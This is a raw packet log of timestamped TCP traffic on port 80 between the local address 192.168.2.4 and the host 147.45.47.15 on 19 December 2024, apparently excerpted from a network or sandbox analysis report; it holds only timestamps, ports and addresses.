Dec 19, 2024 08:52:38.848984957 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.849029064 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.849668026 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.849752903 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.849771976 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.850538969 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.850750923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.850800991 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.851351976 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.851404905 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.851491928 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.852308035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.852356911 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.852370024 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.954652071 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.966742039 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.966860056 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.966901064 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.967227936 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.967343092 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.967451096 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.968411922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.968569994 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.968684912 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.969698906 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.969947100 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.969990969 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.970021963 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.970969915 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.971026897 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.971050024 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.972083092 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.972193003 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.972207069 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.973167896 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.973216057 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.973284006 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.974299908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.974351883 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.974375963 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.975459099 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.975487947 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.975511074 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.976531029 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.976577997 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.976635933 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.977606058 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.977644920 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.977708101 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.978771925 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.978813887 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.978830099 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.979979992 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.980022907 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.980032921 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.980953932 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.981003046 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.981105089 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.982084036 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.982192993 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.982234001 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.983206987 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.983254910 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.983330011 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.984381914 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.984445095 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.984451056 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.985466957 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.985574007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.985603094 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.986618996 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.986668110 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.986689091 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.987812996 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.987826109 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.987854958 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.988838911 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.988883018 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.988913059 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.989916086 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.989993095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.990241051 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.990879059 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.991060972 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.991106033 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.991224051 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.992223978 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.992273092 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.992296934 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.993375063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.993424892 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.993541002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.994740963 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.994827032 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.994872093 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.995492935 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.995798111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.996620893 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.996665001 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.996687889 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.997775078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.997920990 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.998806953 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.998852968 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.998913050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.999792099 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.999918938 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.000081062 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.000092983 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.000492096 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.000534058 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.000690937 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.000701904 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.000716925 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.000735044 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.001137018 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.001355886 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.001368999 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.001411915 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.001857996 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.002202988 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.002213955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.002226114 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.002255917 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.002269030 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.002696991 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.002955914 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.003130913 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.003323078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.003546000 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.003597975 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.003794909 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.003827095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.003947020 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.004420996 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.004575968 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.004616976 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.004767895 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.004795074 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.005167007 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.005568027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.005652905 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.005666018 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.005698919 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.005736113 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.006252050 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.006511927 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.006526947 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.006555080 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.006576061 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.006721020 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.006763935 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.006999969 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.007263899 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.007424116 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.007469893 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.007771969 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.007977009 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.008023977 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.008074045 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.008341074 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.008888960 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.008934975 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.008996964 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.009010077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.009020090 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.009454012 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.009747028 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.009854078 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.009958982 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.009999037 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.010159016 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.010170937 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.010209084 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.010690928 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.010924101 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.010951996 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.010965109 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.011125088 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.011164904 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.011234999 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.011590004 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.011707067 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.011751890 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.012233973 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.012319088 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.012358904 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.012573957 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.012584925 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.012625933 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.013288021 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.013410091 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.013421059 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.013454914 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.013463974 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.013818979 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.014163971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.014293909 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.014338970 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.014478922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.014731884 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.014774084 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.014964104 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.015129089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.015634060 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.015680075 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.015697956 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.015710115 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.015906096 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.016113043 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.016721010 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.016768932 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.016820908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.016832113 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.016844034 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.017345905 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.017638922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.017679930 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.017687082 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.017743111 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.017894030 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.018131971 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.018170118 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.018434048 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.018534899 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.018898964 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.018944025 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.019047976 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.019071102 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.019290924 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.019467115 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.020075083 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.020117044 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.020148993 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.020175934 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.020425081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.020437002 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.021076918 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.021117926 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.021187067 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.021228075 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.021361113 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.021373034 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.021409988 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.021893024 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.022013903 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.022057056 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.022397995 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.022480011 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.022516012 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.022696018 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.022933960 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.022975922 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.023372889 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.023561001 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.023602962 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.023752928 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.023763895 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.024527073 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.024570942 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.024595022 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.024606943 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.024641037 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.025060892 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.025089025 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.025275946 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.025476933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.026216030 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.026268959 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.026273966 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.027157068 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.027168036 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.027208090 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.027982950 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.028002024 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.028757095 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.028804064 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.029012918 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.029630899 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.029669046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.029680014 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.030517101 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.030556917 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.030622005 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.031331062 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.031388044 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.031513929 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.031805992 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.032354116 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.032516956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.032558918 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.033041954 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.033142090 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.033188105 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.034010887 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.034023046 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.034058094 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.034817934 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.034950972 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.034993887 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.035651922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.035747051 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.035792112 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.036576986 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.036725044 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.036768913 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.037337065 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.037425041 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.037467957 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.038203001 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.038439035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.038481951 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.039144993 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.039156914 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.039196968 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.039964914 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.040085077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.040790081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.040834904 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.040991068 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.041757107 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.041800022 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.041810036 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.042409897 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.042537928 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.042646885 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.042767048 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.043482065 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.043493986 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.043554068 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.044254065 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.044487000 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.044578075 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.045064926 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.053841114 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.110582113 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.110613108 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.110665083 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.111016035 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.111057043 CET	80	49730	147.45.47.15	192.168.2.4
